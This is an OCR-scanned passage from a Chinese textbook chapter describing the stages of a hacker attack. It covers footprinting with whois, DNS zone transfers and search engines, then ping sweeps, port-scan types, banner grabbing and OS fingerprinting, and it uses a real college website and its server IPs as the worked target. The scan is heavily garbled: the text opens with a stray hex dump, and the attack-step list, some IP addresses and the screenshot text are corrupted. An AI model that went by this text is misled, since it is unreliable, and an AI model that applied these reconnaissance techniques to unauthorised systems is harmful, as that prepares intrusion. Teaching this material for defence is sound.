O0 13 20 85 1f b7 e0 05 CS e4 cS ce 08 00 45 00 Se 
00 28 3e c2 40 00 38 06 87 16 dc bs 7e 35 cO aS I.I 
O1 64 00 50 07 88 72 23 63 ba 08 Lope re Cl). B: 
20 57 ce dO 00 00 00 00 00 00 00 
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图 2-58 终止 连接 一 一 第 四 次 握手 
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本 童 介绍 黑客 攻击 的 动机 攻击 的 流程 ,被 攻击 对 象 的 信息 收集 ,攻击 的 手段 和 计算 机 
病毒 ,重点 介绍 信息 收集 、 网 络 攻 击 技术 以 及 如 何 利用 工具 攻击 计算 机 系统 。 








3.1 黑客 攻击 的 流程 


黑客 的 动机 究竟 是 什么 ? 在 回答 这 个 问题 之 前 ,应 对 黑客 的 种 类 有 所 了 解 ,原因 是 不 同 
种 类 的 黑客 动机 有 着 本 质 的 区 别 。 从 行为 上 划分 ,黑客 有 “善意 ”和 “恶意 ”两 种 , 即 所 谓 的 白 
帽 (White Hat) 和 黑 帽 (Black Hat) 。 白 帽 利用 他 们 的 技能 做 一 些 善事 ,而 黑 帽 则 利用 他 们 的 
技能 做 一 些 恶 事 。 白 帽 长 期 致力 于 改善 计算 机 社会 及 其 资源 ,为 了 改善 服务 质量 及 产品 ,他们 
不 断 寻 找 弱点 及 脆弱 性 并 公布 于 众 。 例 如 ,为 了 找 出 程序 的 安全 漏洞 ,帮助 生产 三 家 改进 他 们 
的 产品 , 白 帽 做 了 大 量 的 安全 上 的 测试 工作 ,他们 所 做 的 工作 实际 上 是 一 种 公众 测试 形式 。 

尽管 黑客 攻击 系统 的 技能 有 高 低 之 分 .人 侵 系 统 手 法 多 种 多 样 ,但 他 们 对 目标 系统 实施 
攻击 的 流程 却 大 致 相同 。 其 攻击 过 程 可 归纳 为 以 下 9 个 步骤 , 即 踩 点 (Foot Printing) ,扫描 
(Scanning) , Æ 4 (Enumeration) 3k Jf Jj [8] AX (Gaining Access) , 权限 提升 (Escalating 
Privilige) j R (Pilfering) ,掩盖 踪迹 (Covering Track) , 8] Æ J|] (Creating Back Doors) fil 
拒绝 服务 攻击 (Denial of Services) 。 黑 客 攻 击 的 流程 如 图 3-1 所 示 。 

































































踩点 使 用 Whois 、DNS 、Google 收 集 目 
— 未 信息 
| 利用 踩点 结果 ， 查 看 目标 系统 在 哪 
扫描 些 通道 使 用 哪些 服务 ， 以 及 使 用 的 是 
I 什么 操作 系统 竺 
wa 根据 扫描 ， 使 用 与 特定 操作 系统 / 
查 点 服务 相关 技术 收集 用 户 帐户、 共享 
i 资源 及 export 等 信息 
获取 访问 权 发 起 攻击 
S zt 
s St 
拒绝 服务 攻击 权限 提升 | Valse 
1 
改变 、 添 加、 删除 及 复制 用 户 
SIRE 数据 
Y 
盖 踪 迹 修改 /删除 系统 日 志 
ETE 为 以 后 再 次 入 侵 做 准备 











图 3-1 黑客 攻击 的 流程 示意 图 
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3.2 Windows 系统 的 攻击 流程 


3.2.1 踩点 


1. 踩点 基本 原理 

“踩点 "原意 为 策划 一 项 盗窃 活动 的 准备 阶段 。 举 例 来 说 , 当 盗 贼 决定 抢劫 一 家 银行 时 ， 
他 们 不 会 大 摇 大 摆 地 走 进去 直接 要 钱 , 而 是 狠 下 一 番 工 夫 来 搜集 这 家 银行 的 相关 信息 ,包括 
武装 押运 车 的 路 线 及 时 间 、 摄 像 头 的 位 置 .逃跑 出 口 等 信息 。 在 黑客 攻击 领域 “踩点 ”是 指 
传统 概念 的 电子 化 形式 。 

“踩点 ”的 主要 目的 是 获取 目标 的 以 下 信息 。 

CD. 因特网 网 络 域名 网 络 地 址 分 配 ,域名 服务 器 .邮件 交换 主机 和 网 关 等 关键 系统 的 位 
置 及 软 硬 件 信息 。 

© 内 联网 和 Internet 内 容 类 似 , 但 主要 关注 内 部 网 络 的 独立 地 址 空间 及 名 称 空间 。 

@ 远程 访问 模拟 /数字 电话 号 码 和 VPN 访问 点 。 

@ 外 联网 与 合作 伙伴 及 子 公 司 网 络 的 连接 地 址 、 连 接 类 型 及 访问 控制 机 制 。 

© 开放 资源 未 在 前 4 类 中 列 出 的 信息 ,如 Usenet ,雇员 配置 文件 等 。 

为 达到 以 上 目的 ,黑客 常 采用 以 下 技术 。 

(1) 开放 信息 源 搜索 。 通 过 一 些 标准 搜索 引擎 ,揭示 一 些 有 价值 的 信息 。 例 如 ,通过 使 
用 Usenet 工具 检索 新 闻 组 (Newsgroup) 工 作 帖 子 ,往往 能 揭示 许多 有 用 的 东西 。 通 过 使 用 
Google 检索 Web 的 根 路 径 C:Ninetpub ,揭示 出 目标 系统 为 Windows 2003。 对 于 一 些 配置 
过 于 粗心 大 意 的 服务 器 ,利用 搜索 引擎 甚至 可 以 获得 passwd 等 重要 的 安全 信息 文件 。 

(2) whois 查询 。whois 是 目标 Internet 域名 注册 数据 库 。 目 前 ,可 用 的 whois 数据 库 
很 多 。 例 如 ,查询 com, net, edu 及 org 等 结尾 的 域名 可 通过 http://www. networksolutions. 
com 得 到 ,而 查询 美国 以 外 的 域名 则 应 通过 查询 http://www. allwhois. com 得 到 相应 
whois 数据 库 服务 器 的 地 址 后 完成 进一步 查询 。 

通过 对 whois 数据 库 的 查询 ,黑客 能 够 得 到 以 下 用 于 发 动 攻 击 的 重要 信息 : 注册 机 构 ， 
得 到 特定 的 注册 信息 和 相关 的 whois 服务 器 ; 机 构 本 身 , 得 到 与 特定 目标 相关 的 全 部 信息 ; 
域名 ,得 到 与 某 个 域名 相关 的 全 部 信息 ; 网 络 , 得 到 与 某 个 网 络 或 IP 相关 的 全 部 信息 ; 联系 
APOO ,得 到 与 某 个 人 (一 般 是 管理 联系 人 ) 的 相关 信息 。 

例如 ,通过 www. networksolutions. com 查询 到 的 IBM 公司 的 信息 ,如 图 3-2 所 示 。 

G) DNS 区 域 传送 。DNS 区 域 传送 是 一 种 DNS 服务 器 的 元 余 机 制 。 通 过 该 机 制 , 辅 
DNS 服务 器 能 够 从 主 DNS 服务 器 更 新 自己 的 数据 ,以 便 主 DNS 服务 器 不 可 用 时 , 辅 DNS 
服务 器 能 够 接替 主 DNS 服务 器 工作 。 正 常情 况 下 ,DNS 区 域 传送 只 对 辅 DNS 服务 器 开 
放 。 然 而 , 当 系 统管 理 员 配置 错误 时 ,将 导致 任何 主机 均 可 请 求 主 DNS 服务 器 提供 一 个 区 
域 数据 的 备份 ,以 致 目标 域 中 所 有 主机 信息 泄露 。 能 够 实现 DNS 区 域 传送 的 常用 工具 有 
dig,nslookup 及 Windows 版 本 的 Sam Spade. 
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GOIEN. con WHOIS domain registration i 
Registrant: Make this info private 
International Business Machines Corporation 
New Orchard Road 
Armonk, NY 10504 
us 





Domain Name: IBM.COM 


Promote your business to millions of viewers for only $1.25 a month! 
Learn how you can get an Enhanced Business Listing here for your domain name, Learn More 


Administrative Contact : 
IBAA DNS Admin. 
dnsadm@us, ibm.com 

IBM Corporation 

New Orchard Road 
Armonk, NY 10504 

us 

Phone: «19147654227 
Fax: «1,9147654370 


人 IBN con WHOIS domain registration El 


Technical Contact : 
IBM Corporation 
ipregus.ibm.com 
New Orchard Road 
Armonk, NY 10504 

us 

Phone: «19192544441 
Fax: +1.9147654370 








Record expires on 20-Mar-2018 
Record created on 19-Mar-1986 
Database last updated on 13-Mar-2009 











Domain servers in listed order: Manage DNS 
INTERNET SERVEI ICH.IBM.COM 195.176.20.204 
NS. WATSON.IBA.COM 129.34.21 

NS. ALIMACEN.IBM. COM 198.4. 








NS. AUSTIN. IBM.COM. 192.35.232.34 














图 3-2 IBM 公司 信息 


2. Windows 系统 踩点 


1) 攻击 者 使 用 工具 软件 逐步 收集 的 被 攻击 者 信息 

CD 因特网 信息 。 域 名 、 网 络 地 址 范围 ; 经 因特网 可 达 的 系统 IP 地 址 ,系统 上 运行 的 
TCP 和 UDP 服务 ; 访问 控制 机 制 和 访问 控制 列表 ; 入 侵 检 测 系统 ; 系统 查 点 。 

(2) 内 联网 信息 。 内 联网 的 网 络 协 议 是 IP 还 是 DecNet? 内 联网 的 内 部 域名 、 网 络 地 
址 块 ; 经 内 联网 可 达 的 系统 TP 地 址 ,系统 上 运行 的 TCP 和 UDP 服务 ; 访问 控制 机 制 和 访 
问 控 制 列表 ; 入 侵 检测 系统 ; 系统 查 点 。 

G) 外 联网 信息 。 外 联网 是 连接 源 地 址 还 是 目标 地 址 、 连 接 类 型 .访问 控制 机 制 等 。 

(4) 远程 访问 信息 。 数 字 电 话 号 码 、 远 程 系统 类 型 .身份 验证 机 制 .VPN 及 相关 协议 是 
IPSec 还 是 SSL。 
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2) 攻击 者 常用 的 踩点 技巧 

(1) 网 页 搜寻 。 通 常 都 会 从 目标 所 在 的 主页 开始 。 目 标 网 页 可 以 提供 大 量 的 有 用 信 
息 ,甚至 某 些 与 安全 相关 的 配置 信息 。 

(2) 争取 授权 。 黑 客 踩 点 的 第 二 件 事 就 是 争取 获得 必要 的 授权 。 从 技术 角度 将 ， 
TCP/IP 是 五 层 模型 ; 但 从 信息 安全 的 角度 看 ， I UNE 包括 踩点 
是 否 得 到 了 书面 授权 ? 授权 的 范围 和 内 容 是 什么 ? 授权 是 否 来 自 有 权 做 出 该 授权 的 部 门 ? 
目标 IP 地 址 是 否 正确 ? 

CD 链接 搜索 。 通 过 互联 网 上 的 超级 搜索 引擎 来 获得 同 目标 系统 相关 的 信息 。 目 标 网 
站 所 在 的 服务 器 可 能 有 其 他 具有 弱点 的 网 站 ,获得 同 目标 系统 相关 的 信息 ,可 以 进行 迁 回 人 
侵 ,而 且 可 以 发 现 某 些 隐 含 的 信息 。 两 款 超级 搜索 引擎 为 www. dogpile. com 和 www. 
hotbot. com, 

利用 www. dogpile. com 的 whois 查询 ,搜索 “www. hacz. edu. cn”, 显 示 结 果 如 图 3-3 
所 示 ; 利用 www. hotbot. com 的 whois 查询 ,搜索 “河南 财 专 ”, 显 示 结 果 如 图 3-4 所 示 。 


) www. hacz. edu. cn — Dogpile Web Search - Nozilla Firefox 
XQ) 编辑 人 E) EV HLO HEY IAV 帮助 人 0 
€) [Q m X fe [D http://w. dogpile. com/ dot 会 ~ 











J www. hacz. edu. cn - Dogpile Web Search | + 


dögpile I 


Google Yioo! ONG Advanced Search — Preferences 
Web Search Results for "www.hacz.edu.cn" (About Results) 


CEIBS 2012 EMBA Programme 

China Depth Global Breadth Leaming with your international classmates Are you looking for? 
ceibs.edu/EMBA/ * Sponsored: Ads by Google. Haczów 

C Gmina Haczów 
C'N'C Costume National 

New Spring Summer 11 Collection & Fall Winter Sale: Up to 50% Off 


www costumenational com/CNC/ » Sponsored: Ads by Googie 
财 专 主页 
河南 财 考 


www hacz edu cn/ « Found on: Google, Yahoo Search, Bing 


Recent Searches Hide 
hacz.edu.cn 
Clear All 


Hacz edu cn 

Hacz edu cn SmartViper Statistics Mashups. 大 学 生 , 河南 省 , 中 国 大 学 related sites. 
Advanced keyword suggestions. Last updated on February 5 2011 

www markosweb.com/www/hacz edu cn/ = Found on: Yahoo! Search, Bing 


用 户 名 : 
jwgl.hacz.edu.cn/ + Found on: Yahoo! Search, Bing 
政 税务 高 等 专科 学 以 .招生 信息 
考生 指南 . vc 党 群 机 构 公 ， AENDE, 宣传 部 , 组 织 部 , 纪检 委 , 工会 , 团委 RRN 
Hr 校长 办 公 室 ， se. 人 事 处 , 学 生 处 ,财务 处 , 总务 处 , 保卫 处 , 图 书馆 


www.hacz edu.cn/xsc/zhaosheng/ Found exclusively on: Google 


mm 





33 ”搜索 “河南 财 专 ” 相 关 的 网 站 信息 


获取 “河南 财 专 ” 的 信息 : 网 站 服务 器 IP 为 210. 42. 224. 11; 邮件 服务 器 IP 为 210. 42. 224.9; 
教务 管理 系统 TP 为 210. 42. 224. 51; 电话 号 码 ; 到 其 他 Web 服务 器 的 链接 等 。 
获取 信息 的 目的 : 有 可 能 发 掘 漏洞 。 
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2) HotBot Web Search for 河南 财 专 — Nozilla Firefox 
XFO SED FEV PLO HEO IAV «BD 








€)? @ fA X G tQ e: //eehotbot conse Fr ~ | [$E coot 
(@ HotBot web Search tor 河南 财 专 E 


© | 河南 财 专 | “Advanced Search = 
z Search using: | Yahoo! | | iycocom_| msn | 

















CUSTOM WEB FILTERS: No filters selected. HotBot Skins | Preferences 


Jim Cramer's Stock Picks - www.TheStreet.com Sponsored Links 
See what stock Cramer is trading for his charitable trust and why. 

2011 Stock Forecast - www.taipanpublishinggroup.com 3 
Our Experts! Top 5 Investment Picks For This Year! 


Trading Performance - www.cta-online.com 
See performance reports on over 700 professional traders. 


Mortgage Rates Hit 2.9996 - www.SeeRefinanceRates.com 
If you owe less than $729k you probably qualify for govt Refi Programs 


WEB RESULTS powered by VREIOO SEARCH = 
i Mis 

河南 财 考 ，, 地 址 ， 河 南 省 中 件 白 沙 镇 郑 开 大 道 NO: 450002 

www.hacz.edu.cn 


2 ， 河 南 财 政 税 务 高 等 专科 学 校 
现代 教育 技术 中 心 制作 维护 Wicpë0s0024988 地 址 : 河南 省 中 件 白沙 镇 郑 开 大 道 邮编 :450002 流量 监测 


www2.hacz.edu.cn 


3 河南 财 专 图 书馆 -- 首 页 
ii 图 书馆 完成 《河南 财 专 2006 年 度 工作 要 点 分 解 》 工 .关于 图 书馆 为 教 职 
pE m 


www.hacz.edu.cn 


4 河南 财政 税务 高 等 专科 学 校 _ 百 度 百科 
整个 图 案 恰似 一 只 展 起 欲 飞 的 青春 乌 。 充 分 体现 了 河南 财 专 全 体 师 生 团结 、 奋 斗 的 精神 ， 以 及 强烈 的 荣誉 感 和 自豪 感 ! 
baike.baidu.com 








34 ”关键 字 “ 河 南 财 专 ” 的 搜索 结果 


(4) 勘察 网 络 。 勘 察 网 络 是 黑客 确定 目标 网 络 的 拓扑 及 进入 网 络 内 部 的 潜在 访问 通 
道 。 在 Windows 上 有 一 个 tracert 程序 ,该 程序 利用 IP 分 组 中 的 存活 时 间 (Time To Live， 
TTL) 字 段 从 途径 的 每 台 路 由 器 发 出 一 条 ICMP 超时 消息 (TIME_EXCEEDED)。 处 理 该 
分 组 的 每 台 路 由 器 应 该 将 TTL 字段 减 1。 

通常 利用 这 一 功能 确定 分 组 途径 的 准确 路 径 。 它 除了 确认 基于 应 用 程序 的 防火 墙 或 分 
组 过 滤 路 由 器 外 ,还 探索 目标 网 络 采用 的 网 络 拓扑 。 和 运行 tracert 程序 的 计算 机 IP 是 
192. 168. 1. 100 ,利用 tracert 程序 探测 到 达 www. hacz. edu. cn 的 路 径 信息 ,如 图 3-5 所 示 。 

SamSpade 是 一 款 运行 在 Windows 平台 上 的 集成 工具 箱 软 件 , 用 于 大 量 的 网 络 探测 .网 
络 管理 和 与 安全 有 关 的 任务 ,包括 ping. nslookup, whois,dig,traceroute,finger, raw HTTP 
web browser, DNS zone transfer, SMTP relay check, website search 等 工具 。 运 行 
SamSpade 的 计算 机 IP 是 192. 168. 1. 100. f| H] SamSpade 的 tracert 程序 探测 到 达 www. 
hacz. edu. cn 的 路 径 信息 ,如 图 3-6 所 示 。 

黑客 通过 踩点 ,已 经 获得 “河南 财 专 ”的 一 部 分 互联 网 信息 (网 站 服务 器 IP 地 址 为 210. 
42. 224. 11 教务 管理 系统 IP 地 址 为 210. 42. 224. 51 和 邮件 服务 器 IP 地 址 为 210. 42. 224. 9 
以 及 路 由 信息 等 )。 下 一 步 需 要 确定 目标 网 络 范围 内 哪些 系统 是 “活动 ”的 以 及 它们 提供 哪 
些 服务 。 
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图 3-6 SamSpade 探测 到 达 www. hacz. edu. cn 的 路 径 信息 
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3.2.2 扫描 


1. 扫描 基本 原理 

通过 踩点 已 获得 一 定 信 息 (IP 地 址 范围 .DNS 服务 器 地 址 和 邮件 服务 器 地 址 等 ) ,下 一 
步 需要 确定 目标 网 络 范围 内 哪些 系统 是 “活动 ”的 以 及 它们 提供 哪些 服务 。 与 盗窃 案 的 踩点 
TH EE ,扫描 就 像 是 辨别 建筑 物 的 位 置 并 观察 它们 有 哪些 门窗 。 扫 描 的 主要 目的 是 使 攻击 者 
对 攻击 的 目标 系统 所 提供 的 各 种 服务 进行 评估 ,以 便 集 中 精力 在 最 有 和 希望 的 途径 上 发 动 
攻击 。 

扫描 中 采用 的 主要 技术 有 Ping 扫射 (Ping Sweep) , TCP/UDP 端口 扫描 、 操 作 系 统 检 
测 、 弃 标 (Banner) 的 获取 以 及 安全 措施 探查 。 

(D) Ping 扫射 。Ping 扫射 是 判别 主机 是 否 “ 活 动 * 的 有 效 方 式 。Ping 用 于 向 目标 主机 
发 送 ICMP 回 射 请 求 (Echo Request) 分 组 ,并 期 待 由 此 引发 的 表明 目标 系统 “活动 ”的 回 射 
应 答 (Echo Reply) 分 组 。 常 用 的 Ping 扫射 工具 有 操作 系统 的 Ping 命令 及 用 于 扫射 网 段 的 
Íping, WS ping 等 。 

(2) 端口 扫描 。 端 口 扫描 就 是 连接 到 目标 主机 的 TCP 和 UDP 端口 上 ,确定 哪些 服务 
正在 运行 及 服务 的 版 本 号 ,以 便 发 现 相 应 服务 程序 的 漏洞 。 著 名 的 扫描 工具 有 superscan 
及 NetScan Tool Pro( www. nwpsw. com), 

(3) 操作 系统 检测 。 由 于 许多 漏洞 是 和 操作 系统 紧密 相关 的 ,因此 确定 操作 系统 类 型 
对 于 黑客 攻击 目标 来 说 也 十 分 重要 。 目 前 用 于 探测 操作 系统 的 技术 主要 可 以 分 为 两 类 , 即 
利用 系统 旗 标 信息 、 利 用 TCP/IP 堆栈 指纹 。 每 种 技术 又 可 进一步 细 分 为 主动 鉴别 和 被 动 
鉴别 。 常 用 的 检测 工具 有 Nmap.Queso 和 Siphon。 

(4) 旗 标 获取 。 在 旗 标 获取 方法 中 ,使 用 一 个 打开 端口 来 联系 和 识别 系统 提供 的 服务 
及 版 本 号 。 最 常用 的 方法 是 连接 到 一 个 端口 , 按 Enter 键 几 次 ,看 返回 什么 类 型 信息 。 

例如 : 

\[Netat_svr#\] Telnet 192.168.5.33 22 

SSH - 1. 99 — OpenSSH 3.1pl 
表明 该 端口 提供 SSH 服务 ,版 本 号 为 3. 1p1。 

(5) 安全 措施 探查 。 目 前 ,一 般 的 网 络 服务 器 都 会 配置 安全 防护 设备 ,基本 的 有 防火 
墙 ` 人 侵 检测 ,一 些 重要 的 安全 服务 器 会 配置 蜜 缸 系统 、 防 DoS 攻击 系统 和 过 滤 邮 件 等 。 在 
扫描 过 程 中 根据 扫描 结果 ,需要 判断 目标 使 用 了 哪些 安全 防护 措施 。 

获取 的 内 容 包 括 以 下 几 项 。 

CD 获取 目标 的 网 络 路 径 信息 。 目 标 网 段 信息 : 确认 目标 所 在 的 网 段 、 掩 码 情况 ,判断 
安全 区 域 划分 情况 ,为 可 能 的 跳板 攻击 做 准备 。 目 标 路 由 信息 : 确认 目标 所 在 的 具体 路 由 
情况 ,判断 在 路 由 路 径 上 的 各 个 设备 类 型 ,如 是 路 由 器 .三 层 交 换 机 还 是 防火 墙 。 

@ 了 解 目标 架设 的 具体 路 由 情况 ,确认 目标 是 否 安装 了 安全 设施 。 一 般 对 攻击 影响 较 
大 的 有 防火 墙 \ 入 侵 检 测 和 蜜 钠 系 统 。 

@ 了 人 解 目标 使 用 安全 设备 情况 。 这 对 攻击 的 隐蔽 性 影响 很 大 ,同时 也 决定 了 在 后 期 安 
全 后 门 的 攻击 困难 程度 。 这 部 分 主要 包括 入 侵 检 测 .日 志 审 计 及 防 病毒 安装 情况 。 
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2. Windows 系统 扫描 


网 络 踩点 收集 网 络 用 户 名 、IP 地 址 范围 .DNS 服务 器 以 及 邮件 服务 器 等 有 价值 信息 。 
网 络 扫描 将 确定 哪些 系统 在 活动 , 且 能 从 因特网 上 访问 到 。 

1) 确定 系统 是 否 在 活动 

早期 的 Ping 用 于 向 某 个 目标 系统 发 送 ICMP 回 送 请 求 (Echo Request) 分 组 (ICMP 类 
型 为 8) ,并 期 待 目 标 系 统 返 回 ICMP 回 送 应 答 (Echo Reply) 分 组 (ICMP 类 型 为 0)。 对 于 
中 小 规模 的 网 络 ,利用 这 种 方法 来 确定 系统 是 否 在 活动 是 可 行 的 ; 但 对 于 大 规模 网 络 ,Ping 
的 方法 就 显得 效率 低下 。 

在 Windows 系统 中 ,有 许多 可 以 用 来 进行 ICMP Ping 扫描 的 工具 ,其 中 Fping 是 以 并 
行 的 轮 询 形式 发 出 的 大 量 的 Ping 请 求 。Fping 工具 有 两 种 用 法 : 一 种 是 通过 标准 输入 设备 
(stdin) 向 它 提供 一 系列 IP 地 址 ; 另 一 种 是 从 文件 中 读 取 。 每 行 放 一 个 IP 地 址 ,组 成 一 个 
文件 abc. txt, 格 式 如 下 ; 


192.168.26.1 
192.168.26.2 


192.168.26.253 
192.168.26.254 


IRE EHIH" E A XCF: 


C:> fping -H abc. txt 

Fast pinger version 2.22 

(c) WouterDhondt (http: //www.kwakke1flap. com) 

Pinging multiple hosts with 32 bytes of data every 1000 ms: 
Reply[1] from 192.168.26.1: bytes = 32 time = 0.5 ms TTL = 64 
Reply[2] from 192.168.26.2: bytes = 32 time = 0.5 ms TTL = 64 


192.168.26.134 request timed out( 该 机 器 没有 启动 ) 


Reply[253] from 192.168.26.253: bytes = 32 time- 0.5 ms TTL = 64 

Reply[254] from 192.168.26.254: bytes = 32 time- 0.5 ms TTL = 64 

Ping statistics for multiple hosts: 

Packets:Sent = 254, Received = 127,Lost = 127 (50% 1oss)( 机 器 活动 数量 127 台 , 未 启动 数量 

127 € 

Approximate round trip times in milli - seconds: 

Minimum = 0.2 ms,Maximum = 0.5 ms,Average = 0.3 ms 

Fping 还 有 许多 选项 ,此 处 不 再 一 一 列举 。 对 Windows 系统 而 言 ,美国 Foundstone 4 
司 开发 的 SuperScan 软件 的 速度 是 最 快 的。 与 Fping 类 似 ,SuperScan 能 在 同时 发 出 多 个 
ICMP 回 送 请 求 分 组 后 等 竺 并 监听 目标 主机 的 响应 , 它 也 允许 把 解析 出 的 主机 名 存放 在 
HTML 文件 中 。 

2) 确定 哪些 服务 正 处 于 监听 状态 

选 定 当前 监听 的 端口 ,这 对 于 确定 所 用 的 操作 系统 和 应 用 程序 的 类 型 至 关 重 要 。 因 此 ， 
对 目标 系统 的 TCP 和 UDP 端口 进行 连接 ,以 达到 了 解 该 系统 正在 运行 哪些 服务 的 过 程 ,就 
称 为 端口 扫描 。 
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(1) 端口 扫描 技术 。 最 近 几 年 ,端口 扫描 技术 和 扫描 工具 有 很 大 的 发 展 。 大 多 数 工 具 
提供 基本 的 TCP 和 UDP 扫描 能 力 ,并 集成 了 多 种 扫描 技术 。 

(D TCP Connect 扫描 。 该 扫描 是 调用 套 接口 函数 connect() 连 接 目标 端口 ,完成 一 次 
完整 的 三 次 握手 过 程 。 客 户 发 送 一 个 SYN 分 组 给 服务 器 ; 服务 器 发 出 SYN/ACK 分 组 给 
客户 ; 客户 再 发 送 一 个 ACK 分 组 给 服务 器 。TCP 三 次 握手 过 程 在 第 2 章 已 有 详细 介绍 。 

© TCP SYN 扫描 。 该 技术 又 称 为 半 打 开 扫 描 (Half-Open Scanning), 没有 建立 完 
HJ TCP 连接。 扫描 主 机 向 目标 端口 发 送 一 个 SYN 分 组 ,如 能 收 到 来 自 目标 端口 的 SYN/ 
ACK 分 组 , 则 可 推断 该 端口 处 于 监听 状态 ; 如 果 收 到 的 是 一 个 RST/ACK 分 组 , 则 说 明 该 
端口 未 被 监听 。 执 行 端口 扫描 的 系统 随后 发 出 RST/ACK 分 组 ,这 样 并 未 建立 任何 “ 连 
接 ”。 显 然 ,该 方法 比较 隐秘 ,不 易 被 目标 系统 检测 到 。 但 是 ,如 打开 的 半 开 连接 数量 过 多 
时 ,会 在 目标 主机 上 形成 “拒绝 服务 ”而 引起 对 方 的 警觉 。 

© TCP ACK 扫描 。 该 技术 用 于 探测 防火 墙 的 规则 集 。 它 可 以 确定 防火 墙 是 否 只 是 简 
单 地 分 组 过 滤 、 只 允许 已 建 好 的 连接 (设置 ACK 位 ), 还 是 一 个 基于 状态 的 、 可 执行 高 级 的 
分 组 过 滤 防 火 墙 。 

@ TCP NULL 扫描 。 该 技术 是 关 掉 所 有 的 标志 。 根 据 RFC793 文档 规定 ,如 目标 端 
口 是 关 闭 的 ,目标 主机 应 该 返回 RST 分 组 。 

@ TCP SYN/ACK 扫描 。 该 技术 故意 忽略 TCP 的 三 次 握手 。 原 来 正常 的 TCP 连接 
可 以 化 简 为 SYN-SYN/ACK-ACK 形式 的 三 次 握手 来 进行 。 这 里 ,扫描 主机 不 向 目标 主机 
发 送 SYN 数据 包 ,而 先 发 送 SYN/ACK 数据 包 。 目 标 主 机 将 报错 ,并 判断 为 一 次 错误 的 连 
接 。 若 目标 端口 开放 , 则 目标 主机 将 返回 RST 信息 。 

© UDP 扫描 。 该 技术 是 往 目 标 端口 发 送 一 个 UDP 分 组 。 如 果 目 标 端口 发 回 ICMP 
port unreachable 作为 响应 , 则 表示 该 端口 是 关闭 的 ; 否则 该 端口 是 打开 的 。 由 于 UDP 是 
无 连接 的 、 不 可 靠 的 协议 ,因此 上 述 结果 仅 作为 参考 。 

(2) 端口 扫描 工具 。 下 面 介 绍 两 款 流行 的 且 经 过 实践 考验 的 基于 Windows 的 端口 扫 
描 工 具 。 

(D SuperScan。 这 里 目前 速度 最 快 .适应 面 广 的 Windows 端口 扫描 工具 之 一 ,既是 一 
款 黑 客 工 具 , 又 是 一 款 网 络 安全 工具 。 黑 客 利用 它 的 拒绝 服务 攻击 (Denial of Service. DoS) 
收集 远程 网 络 主机 信息 。 作 为 安全 工具 ,SuperScan 能 够 帮助 你 发 现 网 络 中 的 弱点 , 它 可 以 
用 来 进行 Ping 扫描 、TCP 端口 扫描 、UDP 端口 扫描 ,还 可 以 组 合 多 种 技术 同时 进行 扫描 。 

@ Advanced Port Scanner。 这 是 一 种 形式 简洁 扫描 迅 速 以 及 易于 使 用 的 端口 扫描 
器 ,可 以 进行 多 线程 扫描 。 这 种 端口 扫描 器 为 一 般 端 口 列 出 详情 ,可 以 在 扫描 前 预先 设置 扫 
描 的 端口 范围 或 者 是 基于 常用 端口 列表 ,扫描 结果 以 图 的 形式 显示 出 来 。 

(3) 端口 扫描 检测 程序 。 在 Windows 平台 上 ,由 Independent Software 公司 编写 的 
Genius 2. 0 软件 可 以 用 来 监测 简单 的 端口 扫描 活动 (可 以 从 www. indiesoft. com 下 载 ), 这 
个 工具 适用 于 Windows 2000/2003。Genius 会 在 一 段 给 定时 间 内 同时 监听 大 量 的 端口 打 
开 请 求 , 当 它 监测 到 一 次 扫描 时 ,就 会 弹出 一 个 窗口 向 你 报告 来 犯 者 的 IP 地 址 和 DNS X 
机 名 。 

3) 确定 被 扫描 系统 的 操作 系统 类 型 

要 确定 一 个 系统 的 操作 系统 类 型 有 两 种 方法 : 一 种 是 主动 协议 栈 指纹 鉴别 ; 另 一 种 是 
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被 动 协议 栈 指 纹 鉴 别 。 由 于 TCP/IP 协议 栈 只 是 在 RFC 文档 中 描述 ,并 没有 一 个 统一 的 行 
业 标准 ,各 个 公司 在 编写 应 用 于 自己 操作 系统 的 TCP/IP 协议 栈 时 ,对 REC 文档 做 出 了 不 
尽 相同 的 诠释 ,于 是 造成 了 各 个 操作 系统 在 TCP/IP 协议 栈 的 实现 上 有 所 不 同 。 

协议 栈 指 纹 鉴 别 (Stack Fingerprinting) 是 指 不 同 厂家 的 TCP/IP 协议 栈 实现 之 间 存 在 
细微 差别 ,通过 探测 这 些 差异 ,能够 对 目标 系统 所 用 的 操作 系统 进行 比较 准确 的 判别 。 

(1) 主动 协议 栈 指纹 鉴别 。 

(D FIN 探测 分 组 。 发 送 一 个 只 有 FIN 标志 位 的 TCP 数据 包 给 一 个 打开 的 端口 ， 
Windows 发 回 一 个 FIN/ACK 分 组 。 

© ACK 序号 。 发 送 一 个 FIN/PSH/URG 数据 包 到 一 个 关闭 的 TCP 端口 , Windows 
发 回 序号 为 初始 序号 加 1 的 ACK 包 。 

@ 虚假 标记 的 SYN 包 。 在 SYN 包 的 TCP 首部 设置 一 个 准确 定义 的 TCP 标记 ， 
Windows 系统 在 响应 字 节 中 不 设置 该 标记 ,而 是 会 复位 连接 。 

@ ISN( 初 始 化 序列 号 )。 在 响应 一 个 连接 请 求 时 ,Windows 系统 选择 TCP ISN 时 采 
用 一 种 与 时 间 相 关 的 模型 。 

© TOS( 服 务 类 型 )。 对 于 ICMP 端口 不 可 达 消 息 , Windows 送 回 包 的 值 为 0。 

© 主机 使 用 的 端口 。Windows 会 开放 一 些 特 殊 的 端口 ,如 137,139 和 445。 

(2) 被 动 协议 栈 指纹 鉴别 。 主 动 协议 栈 指纹 鉴别 需要 主动 往 目标 发 送 数据 包 , 往 往 容 
易 被 IDS 捕获 。 为 了 隐秘 地 识别 远程 操作 系统 ,就 需要 使 用 被 动 协议 栈 指纹 识别 。 被 动 协 
议 栈 指纹 识别 在 原理 上 和 主动 协议 栈 指纹 识别 相似 ,但 是 它 不 主动 发 送 数据 包 , 只 是 被 动 地 
捕获 远程 主机 返回 的 包 , 并 分 析 其 操作 系统 类 型 或 版 本 。 

在 TCP/IP 会 话 中 ,有 3 个 基本 属性 对 识别 操作 系统 有 用 。Windows 的 3 个 基本 属性 
如 下 。 

(D TTL. (Time-To-Live) —128 表示 存活 期 。 

© Windows Size 窗口 大 小 二 0 X402e。 

© Dont Fragment 位 (DF) 二 0( 分 片 ) 。 

被 动 分 析 这 些 属性 ,符合 上 述 结果 , 则 远程 操作 系统 类 型 为 Windows, 

NMAP 是 一 个 跨 平台 的 端口 扫描 工具 , 它 提 供给 管理 员 扫 描 整 个 网 络 的 能 力 , 并 发 现 
网 络 的 安全 弱点 所 在 。 在 图 3-7 中 ,NmapWin 扫描 到 了 Windows 特殊 端口 137, 因 此 远程 
操作 系统 为 Windows。 


